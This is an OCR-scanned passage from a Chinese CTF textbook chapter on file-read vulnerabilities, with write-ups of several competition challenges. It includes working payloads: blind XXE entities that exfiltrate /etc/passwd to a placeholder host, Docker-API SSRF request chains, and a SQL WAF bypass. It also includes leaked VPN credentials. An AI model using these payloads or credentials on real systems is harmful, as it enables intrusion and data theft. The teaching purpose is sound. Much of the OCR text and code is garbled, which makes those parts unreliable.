if (move_uploaded_file($file['tmp_name'], "/tmp/pwnhub/$name")) { 
$cfgName = trim(shell_exec('python /usr/local/nginx/html/ 

6c58c8751bca32b9943b3dd9ff29bc16/untar.py /tmp/pwnhub/' .$name)); 

$cfgName = trim($cfgName); 
echo "<p> 更 新 配置 成 功 ， 内 容 如 下 </p>"; 
// echo '<br/>'; 
echo '<textarea cols="30" rows="15">',; 
readfile("/tmp/pwnhub/$cfgName"); 
echo '</textarea>'; 

} 

else { 
echo("Failed!"); 

} 


全 


#/usr/LocaL/Vnginx/htmL/6c58c8751bca32b9943b34doff29bc1l6/untar .py 
import tarfile 
import sys 


import uuid 
import os 


def untar(filename): 
os.chdir('/tmp/pwnhub/') 
t = tarfile.open(filename, 'r') 
for i in t.getnames(): 
if '..' in i or '.cfg' != os.path.spLitext(i)[1]: 
return '‘'error' 
else: 
Try 
t.extract(i, '/tmp/pwnhub/') 
except Exception, e: 
return e 
else: 
cfgName = str(uuid.uuid1()) + '.cfg' 
os.rename(i, cfgName) 
return cfgName 
if __name__ == '__main__': 
filename = sys.argv[1] 
if not tarfiLe.is_tarfiLe(fiLename) : 
exit('error') 
else: 
print untar(filename) 


寸 分 析 Linux 的 crontab 定 时 任务 ， 发 现存 在 一 个 定时 任务 : 


ES 这 于 ES ET 
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(6) cron_run.sh 所 执行 的 是 发 送 邮 件 的 Python 脚本 ， 其 中 泄露 了 邮箱 账号 、 密 码 。 
RE 


mail_server = 'smtp.21cn.com' 
mail_port = 465 


(7) 通过 泄漏 的 邮箱 信息 登录 ， 在 邮箱 中 继续 上 友 现 泄露 的 VPN 账 号 密码 ， 见 图 1-3-14。 


(8) 通过 VPN 登 录 内 网 ， 友 现 内 网 存在 一 个 以 Nginx 为 容器 并 且 可 读 flag 的 应 用 ， 但 是 访问 该 应 用 会 
上 友 现 只 显示 Oh Hacked， 而 没有 其 他 输出 。 同 一 IP 下 其 他 亲口 存在 一 个 以 Apache 为 容器 的 Discuz! 


$flag = "xxxxxxxx"; 
include 'safe.php'; 
if($_REQUEST[ 'passwd']='jiajiajiajiajia') { 

echo $flag; 
小 

jiajia<jiajia@buzhengchangrenlei.com> x 
抄 送 | 密 送 
请 妥善 保管 您 的 VPN 信息 


添加 附件 (最 大 20M) 


BZUE 丽 AAA 了 义 | 区 汉江 于 | 国 四 团 ooX 外 和 包 


IPsec VPN server is now ready for usel! 
Connect to your new VPN with these details: 


Server IP: 54.223.177.152 
IPsec PSK: dkQ97gGQPuVm833Ed2F9 
Usemame: 


: pwnhub 
Password: LE3U2aTgc4DGZd92wg82 


Write these down. You'll need them to connect! 
图 1-3-14 
【题目 难度 】 中 等 。 


【知识 点 】Nginx 存 在 漏洞 导致 霖 授权 访问 目录 ， 进 而 导致 文件 读 取 漏洞 ; 构造 仓 在 软 链接 文件 的 压 
缩 包 ， 上 传 压 缩 包 读 取 文件 ;Discuz! X 3.4 任 意 文 件 删除 漏洞 。 


【 解 题 思 路 】 扫 摘 目 录 友 现 .Ds_store (MacO3S 下 默认 会 目 动 生 成 的 文件 ， 主 要 作用 为 记录 目录 下 的 
文件 摆 放 位 置 ， 所 以 里 面 会 他 有 文件 名 等 信息 ) ， 解 析 .DS_Store 文 件 友 现 当前 目录 下 的 所 有 目录 和 
BA 


from ds_store import DSStore 
with DSStore.open("DS_Store", "r+") as f: 


上 友 现 upload 目 录 名 最 后 多 了 一 个 空格 ， 想 到 可 利用 Nginx 解 析 漏 洞 (CVE-2013-4547) 绕 过 i 
| pwnhu 
目录 的 权限 限制 。 原 理 是 通过 Nginx 解 析 漏 洞 ， 让 Nginx 配 置 文 件 中 的 正则 表达 式 /pwnhub 匹 配 失 


败 ， 见 图 1-3-125。 





x/1.4.2 
Oct 2017 09:53:54 G¥ 
text/htal; charset=utf-8 


图 1-3-15 
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在 /pwnhub 目 录 下 存在 一 个 同 级 目录 ， 其 中 存在 PHP 文 件 。 请 求 该 PHP 文 件 ， 友 现存 在 一 个 上 传 表 
单 ， 见 图 1-3-16。 


二 C © 54.223.177.152/6c58c8751bca32b9943b34doff29bc16/index.php 


选择 文件 “未 选择 任何 文件 
上 传 


图 1-3-16 
通过 该 PHP 文 件 上 传 TAR 格 式 的 压缩 包 文件 ， 友 现 应 用 会 将 上 传 的 压缩 包 目 动 解压 (tarfile.open) ， 


于 是 可 以 先 在 本 地 通过 命令 In-s 构 造 好 软 链接 文件 ， Wn 再 利用 tar 命 令 压缩 。 上 
ED 


选择 文件 “未 选择 任何 文件 
上 传 


注意 : 只 支持 tarll 
更 新 配置 成 功 ， 内 容 如 下 


root:x:0:0:root:/root:/bin/bash 


bin:x:2:2:bin:/bin:/usr/sbin/nolo 
gin 
sys:x:3:3:sys:/dev:/usr/sbin/nol 
ogin 
sync:x:4:65534:sync:/bin:/bin/s 
ync 
games:x:5:60:games:/usr/game 
s:/usr/sbin/nologin 
man:x:6:12:man:/var/cache/ma 
nN:/usr/sbin/nologin 
Ip:x:7:7:lp:/var/spool/lpd:/usr/s 
bin/nologin 


图 1-3-17 
读 取 /etccrontab 友 现 ， 在 crontab 中 局 动 了 一 个 奇怪 的 定时 任务 : 


30 * *** root sh /home/jdoajdoiq/jdijiqjwi/jiqjil2i3198ua 
x192/cronerun:sh 


读 取 crontab 中 调用 的 sh 脚本 ， 友 现 内 部 运行 了 一 个 Python 脚 本 ; beast ht 
的 邮箱 账号 和 密码 ， 登 录 这 个 邮箱 ， 获 取 泄 露 的 VPN 账 号 和 密码 ， 见 图 1-3-18。 


成 功 连 接 VPN 后 ， 对 VPN 所 属 内 网 进行 扫描 ， 发 现 部 署 的 Discuz! X 3.4 应 用 和 读 flag 的 应 用 。 依 据 
题目 简介 中 所 禾 述 的 内 容 进行 猜测 ， 需 要 删除 safe.php 才 能 读 到 flag， 于 是 利用 Discuz! X 3.4 任 意 文 
件 删除 漏洞 删除 safe.php， 见 图 1-3-19。 


【总 结 】@ 题 目 沅 程 较 长 ， 参 赛 人 员 应 有 清晰 的 思路 
@ 除 了 Nginx 因 配置 内 容 设置 不 当 导 致 的 目录 穿越 ， 其 目 身 也 仓 企 历 史 漏 洞 可 以 进行 信息 泄露 。 


位 置 : ”自动 
wu 
AT . 
个 : 已 连接 


: 1:48:42 
ve Ci...o IPSec) (A : 192.168.43.12 


@ Lp .apter (1) ， > 
yyA 
S LpSS S..apter (2) 54.223 52 


pwnhub 


未 连接 


@ USB 10/…00 LAN 
和 未 连接 


\ 

& 
@ 蓝牙 PAN 号 

> 


鉴定 设置 ..… 


Wo 断 开 连 接 


未 连接 


® iPhone USB 国 
未 连接 
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~ Thunderbolt 网 桥 
图 1-3-18 
通过 构造 软 链接 实现 文件 读 取 的 题目 还 有 很 多 ， 如 34c3CTF 的 extractOr， 这 里 不 详细 介绍 ， 角 
见 图 1-3-20。 


get flag? x 十 


@© ) © 172.17.0.3jindex.php?passwd=jiajiajiajiajia 


最 常 访问 加 火狐 官方 站 点 区 新 手 上 路 人 常用 网 址 四 京 ; 


INT 号 念 SQL BASICS™ UNION BASED™ ERROR 


a Load URL 


WW Split URL 


上 Execute 


Post data Referrer ” 0xHEX ™ 
pwnhubt{flag:800eaf3244994b224c30e5f24b59f178} 


图 1-3-19 


/etc/passwd 


图 1-3-20 


1.3.3.9 Comment (网 见 杯 2018 线 上 赛 ) 


【题目 简介 】 开 始 是 个 登录 页 面 ， 见 图 1-3-21。 在 题目 网 站 中 友 现 仓 人 在.git 目 录 ， 通 过 GitHack 工 具 
可 以 还 原 出 程序 的 源 代码 ， 对 还 原 出 的 源 代码 进行 审计 ， 友 现存 在 二 次 注入 ， 见 图 1-3-22。 
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和 
图 1-3-22 


图 1-3-22 
【题目 难度 】 中 等 。 
【知识 点 】.git 目 录 未 删除 导致 的 源码 泄露 ; 二 次 注入 (MySQL) ; 通过 注入 漏洞 (load file) 读 取 


文件 内 容 (.bash_history->.DS_9store->flag) 。 


【 解 题 思路 】 打 开 BurpSuite 对 登录 的 流量 进行 抓 包 ， 使 用 BurpSuite 自 带 的 Intruder 模 块 爆破 密码 后 
3 字 节 ， 爆 破 的 参数 设置 见 图 1-3-23。 














ogg0g00g0g0000g0g0 
目 目 目 目 卓 卓 日 日 目 日 日 日 


图 1-3-23 
通过 git 目 录 港 露 还 原 出 应 用 源 代 码 ， 通 过 审计 源码 发 现 SQL 注 入 (二 次 注入 ) ， 对 注入 漏洞 进行 利 
用 ， 但 是 发 现 数据 库 中 没有 flag; 尝试 使 用 load file 读 取 /etc/passwd 文 件 内 容 ， 成 功 ， 则 记录 用 户 
名 www 及 其 workdir: /home/www/; 读 取 /home/www/.bash history， 友 现 服务 器 的 历史 


人 。 
Gr 


cp -r htmL /var/www/ 
cd /var/www/html/ 

rm -f .DS_Store 
service apache2 start 


根据 .bash_history 文 件 内 容 的 提示 ， 读 取 /tmpy/.DS Store， 发 现 并 读 取 flag 文 件 flag 8946e1ff1 
e 
3e40f.php (注意 这 里 需要 将 load file 结 果 进 行 编码 ， 如 使 用 MySQL 的 hex 函 数 ) 。 


【总 结 】 本 题 是 一 个 典型 的 文件 读 取 利 用 链 ， 在 能 利用 MySQL 注 入 后 ， 需 要 通过 .bash_history 泄 露 
更 多 的 目录 信息 ， 然 后 利用 搜集 到 的 信息 再 次 读 取 。 


1.3.3.10 方舟 计划 (CISCN 2017) 


【题目 简介 】 题 目 存 在 注册 、 登 录 的 功能 。 使 用 管理 员 账号 登录 后 可 上 传 AVI 文 件 ， 并 且 将 上 传 的 AVI 
文件 目 动 转换 成 MP4 文 件 。 
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【题目 难度 】 人 简单。 


【知识 点 】 使 用 内 联 注释 绕 过 SQL 注入 WAF; FFMPEG 任 意 文 件 读 取 。 


【 解 题 思路 】 遇 到 存在 登录 及 注册 功能 并 且 普 通 注册 用 户 登 录 系 统 后 无 功能 的 CTF Web 题 目 时 ， 先 党 
试 注入 ， 通 过 黑 合 测试， 发 现 注册 阶段 存在 INSERT 注 入 漏洞 ， 在 深入 利用 时 会 发 现存 在 WAF， 接 着 
使 用 内 联 注 释 绕 过 WAF (/*! 50001select*/) ， 见 图 1-3-24。 


图 1-3-24 
通过 该 注入 漏洞 继续 获取 数据 ， 可 以 得 到 管理 员 账 号 、 加 密 后 的 密码 、 加 密 所 用 密 铀 er 


cy 
) ， 通 过 AES 解 密 获取 明文 密码 。 


利用 注入 得 到 的 用 户 名 和 密码 登录 管理 员 账 号 ， 发 现在 管理 员 页 面 存在 一 个 视频 格式 转化 的 功能 ， 猿 
测 题 目的 考查 内 容 是 FFMPEG 的 任意 文件 读 取 漏洞 。 


利用 已 知 的 exploit 脚 本 生成 恶意 AVI 文 件 并 上 传 ， 下 载 转化 后 的 视频 ， 播 放 视 频 可 友 现 能 成 功 读 取 到 
文件 内 容 (/etcpasswd) ， 见 图 1-3-25。 


图 1-3-295 
根据 /etc/passwd 的 文件 内 容 ， 友 现存 在 名 为 sS0m3b0dy 的 用 尸 ， 猜 测 flag 在 其 用 尸 目 录 下 ， 即 / 
ome 
/so0m3b0dy/flag (.txt) ; 继续 通过 FFMPEG 文 件 读 取 漏 洞 读 取 flag， 友 现成 功 获得 flag， 见 图 1 
-3-26。 


图 1-3-26 
【总 结 】@ 本 题 使 用 了 一 个 比较 典型 的 绕 过 SQL 注 入 WAF 的 方法 (内 联 注释 ) 。 


@ 本 题 紧 跟 热点 漏洞 ， 且 读 文件 的 效果 比较 新 突 、 有 趣 。FFM PEG 信 总 文件 读 双 漏洞 的 原理 主要 是 。 
(HTTP Live Streaming) 协议 支持 File 协 议 ， 导 致 可 以 读 取 文件 到 视频 中 。 


另 一 个 比较 有 特色 的 文件 读 取 呈 现 效 果 的 比赛 是 2018 年 南京 邮电 大 学 校 赛 ， 题目 使 用 PHP 动 态 生成 图 
片 ， 在 利用 时 可 将 文件 读 取 漏 ; 间 读 到 的 文件 内 容 贴 合 到 图 片上 ， 见 图 1-3-27。 
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图 1-3-27 


1.3.3.11 PrintMD (RealWorldCTF 2018 线 上 赛 ) 


【题目 简介 】 题 目 提 供 的 功能 可 将 在 线 编 辑 器 Markdown (hackmd) 的 内 容 泻 染 成 可 打印 的 形式 。 
泻 染 方式 分 为 客户 端 本 地 泻 染 、 服 务 疹 远 程 泻 染 。 


客户 端 可 以 进行 本 地 调试 ， 服 务 端 远 程 泻 染 部 分 的 代码 如 下 : 


// render.js 

const {Router} = require('express') 

const {matchesUA} = require('browserslist-useragent') 
const router = Router() 

const axios = require('axios') 

const md = require('../../plugins/md_srv') 


router.post('/render', function (req, res, next) { 
let ret = {} 
ret.ssr = !ImatchesUA(req.body.ua, { 
browsers: ["last 1 version", "> 1l%", "IE 10"], 
_aLLowHigherVersions: true 
D); 
if (ret.ssr) { 
axios(req.body.url).then(r => { 
ret.mdbody = md.render(r.data) 
res.json(ret) 
上 
} 
else { 
ret.mdbody = md.render('# 请 稍 候 ..') 
res.json(ret) 
} 
]); 


module.exports = router 


服务 端 配 备 Docker 环 境 ， 并 且 局 动 了 Docker 服 务 。 

flag 在 服务 器 上 的 路 径 为 /flag。 

【题目 难度 】 难 。 

【知识 点 】JavaScript 对 象 污染 ; axios SSRF (UNIX Socket) 攻击 Docker API 读 取 本 地 文件 。 


【 解 题 思路 】 审 计 客户 端 被 Webpack 混 淆 的 代码 ， 找 到 应 用 中 与 服务 端 通信 相关 的 逻辑 ， 对 混淆 过 
的 代码 进行 反 温 淆 。 得 到 的 源 代码 如 下 : 


validate: function(e) { 
return e.query.url && e.query.url.startsWith("https://hackmd.io/") 
有 
asyncData: function(ctx) { 
if(!ctx.query.url.endsWith("/download")){ 
ctx.query.url += "/download"; 
1 
ctx.query.ua = ctx.req.headers["user-agent"] || ""; 
return axios.post("/api/render", qs.stringify({...ctx.query})).then(function(e) { 
return { 
..e.data, 
url: ctx.query.url 
} 
ph 
he 
mounted: function() { 
if (ithic cer){ 
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WW 


axios(this.url).then(function(t) { 
this.mdbody = md.render(t.data) 
i 
} 
小 


接着 利用 HTTP 参 数 污 染 可 以 绕 过 startsWith 的 限制 ， 同 时 对 req.body.url (服务 端 ) 进行 对 象 污染 
使 服务 端 axios 在 请 求 时 被 传 入 socketPath 及 url 等 参数 。 再 通过 SSRF 漏 洞 攻击 Docker APl， i 
拉 入 Docker 容 器 ， 调 用 Docker API 读 取 Docker 内 文件 。 


具体 的 攻击 流程 如 下 。 


@ 拉 取 轻 量 级 镜像 docker pull alpine: latest=> 


url[method]=post 
&url[url]=http://127.0.0.1/images/create?fromImage=alpine:latest 
Surl[socketPath]=/var/run/docker. sock 
&url=https://hackmd.io/aaa 


@ 创 建 容器 docker create-v/flag:/flagindocker alpine--entrypoint "/bin/sh"--name ctf 本 
alpine 
: latest= > 


urL[method]=post 
&url[url]=http://127.0.0.1/containers/create?name=ctf 
&urL[data][Image]=aLpine:Latest 

&urL[data] [VoLumes][fLag][path]=/fLagindocker 
&urL[data][Binds][]=/fLag:/fLagindocker:ro 


Surl[data] [Entrypoint][]=/bin/sh 


Surl[socketPath]=/var/run/docker. sock 
Surl=https://hackmd.io/aaa 


启动 容器 docker Td 


url[method]=post 
&url[url]=http://127.0.0.1/containers/ctf/start 
&url[socketPath]=/var/run/docker. sock 
&url=https://hackmd.io/aaa 


读 取 Docker 的 文件 archive : 


url[method]=get 
&url[url]=http://127.0.0.1/containers/ctf/archive?path=/flagindocker 
&url[socketPpath]=/var/run/docker. sock 

&url=https://hackmd.io/aaa 


【总 结 】 题 目 考 查 的 点 十 分 细 肢 、 新 闫 ， 由 于 axios 不 支持 File 协 议 ， 因 此 需要 参赛 者 利用 SSRF 控 制服 
务 端的 其 他 应 用 来 进行 文件 读 取 。 


类 似 axios 模 块 这 样 可 以 进行 UNIX Socket 通 信和 的 还 有 curl 组 件 。 


1.3.3.12 粗心 的 住 佳 (PWNHUB) 


【题目 简介 】 入 口 提 供 了 一 个 Drupal 前 人 台 ， 通 过 搜集 信息 ， 友 现 服务 器 的 23 疹 口 开 了 FTP 服 务 ， 并 且 
FTP 服 务 存在 弱 口 令 ， 使 用 弱 口 令 登 录 FTP 后 在 FTP 目 录 下 发 现存 在 Drupal 插 件 源码 ， 并 且 Drupal 插 
件 中 存在 SQL 注 入 漏洞 ， 同 时 在 内 网 中 存在 一 台 Windows 计 算 机 ， 开 启 了 80 端 口 (Web 服 务 ) 。 


【题目 难度 】 中 等 。 


【知识 点 】Padding Oracle Attack; Drupal 8.x 有 反 序 列 化 漏 浊 ; Windows PHP 本 地 文件 包含 / 读 取 
的 特殊 利用 近 巧 。 


【 解 题 思路 】 根 据 题目 提示 ， 对 FTP 登 录 口 令 进 行 暴力 破解 ， 发 现 FTP 存 在 弱 口 令 登 录 ， 通 过 FTP 服 务 
可 以 下 载 Drupal 插 件 源码 。 


通过 对 下载 到 的 插件 源码 进行 审计 ， 友 现存 在 SQL 注 入 漏洞 ， 但 是 用 户 的 输入 需要 通过 AES-CBC 模 式 
解密 ， 才 会 补 代 入 SQL 语 句 。 


private function set_decrypt($id){ 
if($c = Base64decode(Base64decode($id))) 


if($iv = substr($c, 0, 16)) 
{ 


if($pass = substr($c,17)) 
{ 
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if($u = openssl_decrypt($pass, METHOD, SECRET_KEY, OPENSSL_RAW_DATA, $iv)) 
{ 
return $u; 


else 
die("hacker?"); 


else 
return 1; 
} 
else 
return 1; 
} 
else 
return 1; 


public function get_by_id(Request $request){ 

$nid = $request->get('id'); 

$nid = $this->set_decrypt($nid); 

//echo $nid; 

$this->waf ($nid); 

$query = db_query("SELECT nid, title, body_value FROM node_fieLd_data left 
JOIN node__body ON node_fieLd_data.nid=node__body .entity_id 
WHERE nid = {$nid}")->fetchAssoc(); 

return array('#title' => $this->t($query['title']), 

'#markup' => '<p>' . $this->t($query['body_value']).'</p>',); 


通过 审计 加 密 的 流程 ， 发 现 可 以 通过 padding oracle attack 伪 造 SQL 注入 语句 的 密 文 ， 见 图 1-3- 
， 继 续 利用 SQL 注入 漏洞 注入 得 到 用 户 的 邮箱 和 邮箱 密码 ， 见 图 1-3-29。 


图 1-3-28 


原 需 侍 


图 1-3-29 
利用 注入 得 到 的 邮箱 信息 进行 登录 ， 在 邮箱 中 得 到 泄露 的 在 线 文 档 地 址 ， 打 开 后 恢复 历史 和 版本， 发 现 
admin 密 码 。 利 用 恢复 得 到 的 admin 密 码 登 录 Drupal 后 台 ， 结 合 后 台 的 信息 判断 出 Drupal 对 应 的 版 
本 ， 发 现存 在 反 序 列 化 漏洞 。 构 造反 序列 化 payload 进 行 Getshell，phpinfo 函 数 的 执行 结果 见 图 1-3 
-30。 


€ GC © 54.223.191.248/admin/config/development/configuration/single/import 








图 1-3-30 
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Getshell 后 ， 对 服务 器 所 在 的 内 网 进行 扫描 ， 友 现存 在 Windows 主 机 并 且 开 启 了 Web 上 服务， 经 过 简 
EW 


测试 文件 包含 的 漏洞 会 友 现 存在 一 定 的 WAF， 即 不 能 输入 正常 上 传 的 文件 名 ,使 用 “<” 作 为 文件 名 
通配符 绕 过 WAF， 如 “123333<.txt”。 


【总 结 】Padding Oracle Attack 是 Web 中 常见 的 Web 安 全 结合 密码 学 的 攻击 方式 ， 需 要 熟练 掌握 ， 
相关 细节 读者 可 参考 本 书 第 3 章 第 3 节 。 


Windows PHP 文 件 包 含 / 读 取 可 以 使 用 通配符 ， 当 我 们 不 知道 目录 下 的 文件 名 或 WAF 设 置 了 一 定 的 规 
则 进行 拦截 时 ， 融 可 以 利用 通配符 的 技巧 进行 文件 读 取 。 有 具体 对 应 正则 通配符 规则 如 下 : Windows 
个 ，>” 相当 于 正则 通配符 的 ”? <， 个 当 于 ”人 目 当 于 到 


1.3.3.13 教育 机 构 ( 强 网 杯 2018 线 上 赛 ) 


[题目 简介 题目 存在 一 个 评论 框 ， 评 论 框 支持 XML 语 法 ， 可 造成 XXE， 配 置 文件 中 存放 着 一 半 ， 
le 
;内 网 存在 一 个 Web 服 务 。 


【题目 难度 】 中 等 。 
【知识 点 】 利 用 XXE 漏 洞 读 取 文件 ， 进 行 SSRF 攻 击 。 


【 解 题 思路 】 通 过 对 网 站 应 用 目录 进行 扫描 ， 友 现 网 站 的 .idea/workspace.xml 潍 露 ,在 。 
Wold CokTels 
.Xm 的 内 容 中 有 一 段 XML 调 用 实体 的 变量 被 注释 。 而 题目 只 有 comment 一 个 输入 点 ， 于 是 测试 是 否 
存在 XXE 漏 洞 (输入 XML 头 部 “<? xml version="1.0"encoding="utf-8"? >”， 可 观察 到 返回 


包公 件 报 中 9 见 图 1 S31 


通过 相应 内 容 中 报错 显示 的 simplexml_load _string 孙 数 ， 基 本 确认 了 XXE 漏 洞 的 存在 ， 接 着 尝试 构造 
远程 实体 调用 实现 Blind XXE 的 利用 。 构 造 的 利用 数据 如 下 : 


<!ENTITY % payload SYSTEM "php://filter/read=convert.Base64-encode/resource=/etc/passwd"> 
<!ENTITY % int "<!ENTITY &#37; trick SYSTEM 'http://ip/test/?xxe_local=%payload;'>"> 
%int; 

%trick; 


Date: Mon, 26 Mar 2018 09:18:17 GMT 
Server: Apache/2.4.7 (Ubuntu) 
X-Powered-By: PHP/5.5.9 

Vary: Accept-Encoding 
Content-Length: 721 

Connection: close 

Content-Type: text/html 


<br /> 

<b>warning</b>: simplexml load string(): Entity: line 1: 
parser error : Start tag expected, ‘&lt;' not found in 
<b>/var/www/52dandan.cc/public html/function.php</b> on 
line <b>54</b><br /> 

<br /> 

<b>warning</b>: simplexml load string(): &lt;?xml 
version=&quot;1.0&quot; encoding=&quot;utf-8&quot;?&gt; in 
<b>/var/www/52dandan.cc/public html/function.php</b> on 
line <b>54</b><br /> 

<br /> 


图 1-3-31 
根据 测试 XXE 是 否 存 在 时 的 报错 内 容 可 以 发 现 Web 目 录 位 置 ， 利 用 XXE 漏 洞 读 取 Web 应 用 的 源码 ， 发 
现在 config.php 文 件 中 存在 着 一 半 的 flag 内 容 。 


#/var/www/S52dandan.cc/public_html/config.php 
<?php 


define(SECRETFILE, '/var/www/52dandan .com/public_html/youwillneverknowthisfile_e2cd3614b63ccdcbfe7c 
8f07376fey31'); 
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?> 
#youwiLLneverknowthisfiLe_e2cd3614b63ccdcbfe7c8f07376fe431 
Ok,you get the first part of flag : 5bdd3bgbalfcb49 

then you can do more to get more part of flag 


然后 在 本 机 寻找 另 一 半 flag， 以 失败 告终 。 猜 测 另 一 半 的 flag 内 容 在 内 网 中 ， 于 是 依次 谈 私 /etc/ 
OS 
、/proc/net/arp， 发 现存 人 在 内 网 IP: 192.168.223.18。 


利用 XXE 漏 洞 访问 192.168.223.18 的 80 端 口 (也 可 以 进行 端口 扫描 ， 这 里 直接 猜测 常见 端口 ) ， 发 现 
192.168.223.18 主 机 存在 Web 服 务 且 存 在 SQL 注入 。 利 用 盲 注 注入 获得 flag 的 另 一 半 。 


<!ENTITY % payLoad SYSTEM "http://192.168.223.18/test.php?shop=3'-(casesagwhen((1)]Like(1))then(9)eLse(l1)end)-'1"> 
<!ENTITY % int "<!ENTITY &#37; trick SYSTEM 'http://ip/test/?xxe_local=%payload;'>"> 

%jinti 

%trick; 


【总 结 】 本 题 考查 的 是 PHP XXE 漏 洞 的 文件 读 取 利用 方法 ,不同 语 言 的 XML 扩 展 支 持 的 协议 可 能 
同 。PHP 十 分 有 特色 地 保留 了 PHP 协 议 ， 所 以 可 以 用 Base64 这 个 Filter 编 码 读 取 到 的 文件 内 容 ， 避 免 
由 于 “&” “<” 等 特殊 字符 截断 Blind XXE， 导 致 漏洞 利用 失败 。 


1.3.3.14 Magic Tunnel (RealworldCTF 2018 线 下 赛 ) 
【题目 简介 】 使 用 Django 框 架 搭建 Web 服 务 ， 会 使 用 pycurl 去 请 求 用 户 传 入 的 链接 。 


请 求 链接 部 分 的 源码 如 下 : 


def download(self, url): 


try: 
c = pycurl.Curl() 
c.setopt(pycurl .URL, url) 
c.setopt(pycurl .TIMEOUT, 10) 
response = c.perform_rb() 
c.close() 

except pycurl.error: 
response = b' 


return response 


【题目 难度 】 较 难 。 
【知识 点 】 通 过 SSRF 漏 洞 对 uwsgi 进 行 攻击 。 


【 解 题 思路 】 通 过 文件 读 取 漏洞 去 读 取 file:///proc/mounts 文 件 ， 可 以 看 到 Docker 目 录 挂 载 情 ) 
见 图 1-3-32。 


cqroup /sys/fs/ cgroup/blkio cgroup 和 0 je 
Sgroup, /sys/fs/cgroup/memory cgroup roinosuid,nodev,noexec,relatime,memory 0 0 
Sgroup /sys/fs/cgroup/devices cgroup ro,nosuid, nodey .noexec, relatime,deyices 0 
Sgroup, /sys/fs/cgroup/freezer cgroyp ro,nosuid, nodey .noexec, relatime,freezer. 0 
Sgroup /sys/fs/cgroup/net_cls cgroup ro,nosuid, nodey.noexec, relatime.net_cls 0 
cgroup /sys/ fs/cqroup/perf_ event cgroup ronosuid,nodev,noexec,relatime, perf_event 0 
cgroup /sys/fs/cgroup/net_prio cgroup TT “io.00 
Sgroup /sys/fs/cgroup/hugetlb cgroup ro,nosuid, nodey.n exec Tenatine huaet hb 8 9 
Sgroup /sys/fs/cgroup/pids, cgroup r Q, QA no RY nr Ce Satatine nds 0 
pp rr /dev/mqueue mqueue rw,nosuid, nodey,noexec, relatime 0 0 

/dev/vdaz2. /etc/resoly,conf. ext4 4 fu fal atlnea sr cots rRRoNNt=rA daXaorder ed 0 0 
/dev/Vvda2. /etc/hostname ext4 rw,relatime,errors=remount-ro,data=ordered 0 0 
/dev/vda2. /etc/hosts ee ruralatimeasr rors ranount adatacordered 0 0 
Shm /dev/5hn_xkmn lanodev. Noexec, relatime, size=65536k 0 0 
/dev/vds /usr/src7rueti/nedie eat4 rw,relatime,errors=remount-ro,data=ordered 0 0 
/dev/vda2 /usr/src/ Eye static ee rwirelatime,errors=remount-ro,data=ordered 0 0 
proc /pro TS ntletatIiMe Vv 
proc /proc/fs proc time 0 ， 
proc /proc/irg proc ro,relatime 0 
proc /proc/sys proc ro,relatime 0 8 
proc /proc/sysrq-trigger proc gurenatine. © 
tmpfs /proc/acpi tmpfs ro,relatime 0 
tmpfs /proc/kcore tmpfs rr 0 0 
tmpfs /proc/keys tmpfs rw.nosuid,size=65536k,mode=755 0 0 
tmpfs /proc/timer_list tmbts ruinosuid, size=65536k, mode=755 9 0 
tmpfs /proc/timer_stats tmpfs rw.nosuid,size=65536k,mode=755 0 0 


+mnfs /nrocr/sched dehun +mnfs rw.nnsuid.size=ASS36k .mnde=755 0 .0 
图 1-3-32 
在 成 功 找到 目录 后 ， 融 可 以 通过 文件 读 取 漏 洞 读 取 整个 应 用 的 源 代 码 ， 通 过 服务 器 的 server.sh 文 件 的 
内 容 ， 可 知 Web 应 用 使 用 uwsgi 尼 动 (也 可 以 通 te 
.sh 文件 的 内 容 如 下 : 


serVver 


#!/bin/sh 
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BASE_DIR=$ (pwd) 
./manage.py collectstatic --no-input 
./manage.py migrate --no-input 


exec uwsgi --Ssocket 0.0.0.0:8000 --module rwctf.wsgi --chdir ${BASE_DIR} --uid nobody --gid nogroup 
--cheaper-aLgo spare --cheaper 2 --cheaper-initial 4 -~-workers 10 --cheaper-step 1 


通过 SSsRF 漏 洞 ， 利 用 Gopher 协 议 攻 击 uwsgi (注入 SCRIPT_NAME 运 行 恶 意 Python 脚 本 或 直接 使 用 
EXEC 执 行 系统 命令 ) 。 


【总 结 】 本 题 需要 通过 File 协 议 进行 任意 文件 读 取 ， 完 成 对 服务 器 的 信息 搜集 ， 即 通过 /proc/mounts 
泄露 应 用 路 径 ， 从 而 获知 如 何 进行 下 一 步 的 文件 读 取 。 


1.3.3.15 Can you find me? (WHUCTF 2019， 武 汉 大 学 校 赛 ) 


【题目 简介 】 题 目 中 他 在 一 处 较 明 显 的 文件 包含 漏洞 ， 但 是 已 知 信息 是 flag 在 相对 路 径 ./../flag 处 ， 并 
且 在 利用 文件 包 合 漏洞 时 友 现 存在 WAF， 禁 止 进行 相对 路 径 跳 转 。 


<?php 
error_reporting(0); 
#system('cat ../../../flag'); 
$file_name = @$_GET['file']; 
if (preg_match('/\.\./', $file_name) !== 0){ 
die("<h1> 文 件 名 不 能 有 '..'</h1>"); 
} 


【题目 难度 】 人 简单 . 
【知识 点 】PHP 文 件 包含 漏洞 。 


【 解 题 思路 】 通 过 读 取 Apache 配 置 文件 找到 Web 目 录 ， 见 图 1-3-33。 


<ul clLass= "nav navbar-nav "> 
<Li><a href="./?fiUe=about ,html">About</a></1i> 
</ul> 
</div> 
</div> 
</div> 


<VirtualHost *:80> 
# The ServerName directive sets the request scheme, hostname and port that 
# the server uses to identify itself. This is used when creating 
# redirection URLs. In the context of virtual hosts, the ServerName 
# specifies what hostname must appear in the request's Host: header to 
# match this virtual host,. For the default virtual host (this file) this 
# value is not decisive as it is Used as a last resort host regardless. 
# However, you must set it for any further virtual host explicitly. 
#ServerName www.example.com 
ServerAdmin webmaster@localhost 
DocumentRoot /Th15 ls TAT tHe Pl4se You NSVSR KnOW/var/www/htm\ 
# Available loglevels: trace8, ..., tracel, debug, info, notice, warn, 


# error, crit, alert, emerg. 
# It is also possible to configure the loglevel for particular 


图 1-3-33 


已 和 类 Web 目录 后 ， 可 和 直接 通过 Web 目 录 构 造 flag 文 件 的 绝对 路 径 ， 绕 过 相对 路 径 的 限制 ， 读 取 flag， 
见 图 1-3-34。 


图 1-3-34 
[总 结 】 这 是 一 道 经 典 的 文件 读 取 类 型 的 题目 ， 主 要 考查 参赛 者 对 于 Web 配 置 文件 信息 搜集 的 能 
需要 通过 读 取 Apache 配 置 文件 发 现 Web 目 录 ， 通 过 构造 绝对 路 径 ， 绕 过 相对 路 径 的 限制 ， 完 成 flag 
文件 的 读 取 . 
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小 结 


